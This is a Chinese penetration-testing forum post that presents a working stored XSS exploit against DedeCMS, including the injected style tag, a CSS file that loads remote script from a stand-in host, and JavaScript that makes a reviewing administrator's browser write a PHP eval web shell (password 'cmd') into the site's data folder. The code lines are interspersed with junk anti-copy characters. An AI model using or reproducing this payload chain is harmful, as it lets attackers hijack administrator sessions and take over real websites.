找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1730|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
1 Y6 i! F6 }! {/ u为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
& _5 n! _3 {4 L0 h目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
+ |  Q2 Y" ]; q- a下面说说利用方法。/ Y1 s) s/ t6 W# h5 I- b+ t( x" }
条件有2个:4 n) C* t7 A  g
1.开启注册
" j" `/ O3 |( p" ^# R2.开启投稿
$ f$ r8 n0 U' c0 M" e注册会员----发表文章; ]  B2 T; Q. e6 u
内容填写:9 P9 t4 g& L, e6 X( U
复制代码
- V5 ?7 W% T9 N8 _- \0 u<style>@im\port'\http://xxx.com/xss.css';</style>
) Q3 R) w' }8 C' z) B; K新建XSS.Css
: s: R( C3 z) ]7 \! z, O复制代码
, s! _5 R2 I3 \- F1 }5 Z, Z.body{
% C6 ]% k6 s: }2 B4 bbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }$ I+ }$ N/ t) |$ y* v% @5 z4 F* Z
新建xss.js 内容为& f* O4 ^$ j2 T" G; k1 b& c# ?( x
复制代码' S& l, x: x3 n- ?
1.var request = false;4 a& ?% N7 ?1 \% V. Q* H
2.if(window.XMLHttpRequest) {
* n( w- {! n8 e! p1 a3.request = new XMLHttpRequest();
) W: K  a8 t; {4.if(request.overrideMimeType) {
- ^7 j) m7 [9 p/ B5.request.overrideMimeType('text/xml');
4 b( C* |5 q" G  Y* E# A# J+ M3 d6.}
" c6 Y/ a, o5 F: T% j+ |7.} else if(window.ActiveXObject) {. f' ~- X8 t5 Z8 Z2 R; M8 H6 \
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];6 A, S' }# T2 c* D4 X8 f
9.for(var i=0; i<versions.length; i++) {* v- S& B1 C; p0 @
10.try {3 g0 b& t# h0 t0 x" C. e7 I
11.request = new ActiveXObject(versions);
+ e( s; Q( H1 _' |& Z6 n12.} catch(e) {}3 M3 ]5 B' E# m6 E: I+ K
13.}' }( m& H$ Z6 H4 n5 ?8 X
14.}% B8 i$ M2 c( v4 u, W7 o' e. f
15.xmlhttp=request;/ c$ Y$ U: e; s7 v
16.function getFolder( url ){
5 `6 {4 b5 l; _5 X0 u# r17. obj = url.split('/')
( O* v' J$ i% {' H18. return obj[obj.length-2]' Y  ^& r9 c9 A3 r
19.}
% K/ m0 w5 U( ~1 Q" c0 _+ s) m20.oUrl = top.location.href;
( Y! ~; Z4 _# P/ w# J' n- l, [# |21.u = getFolder(oUrl);/ s4 D( l7 @0 o' `1 `
22.add_admin();
$ _0 i. p) X$ n23.function add_admin(){
% v5 `: h9 w9 N5 ^) y. u24.var url= "/"+u+"/sys_sql_query.php";" [0 ]4 |, Z9 S: o' W, [
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
+ o) c, t2 Y# v1 C; T& ]& f6 k( V. Y26.xmlhttp.open("POST", url, true);, `1 ^" D! j$ g& t& ?$ a
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");2 A2 @7 d, m4 b9 s+ @$ K+ b
28.xmlhttp.setRequestHeader("Content-length", params.length);0 x8 o( A& ?1 l2 j3 E) E7 q
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");2 G& v4 E* M7 K8 a5 Q( f
30.xmlhttp.send(params);. B/ I  a5 E! L  h
31.}, M1 J8 _' [4 W' S" ?# S/ _
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表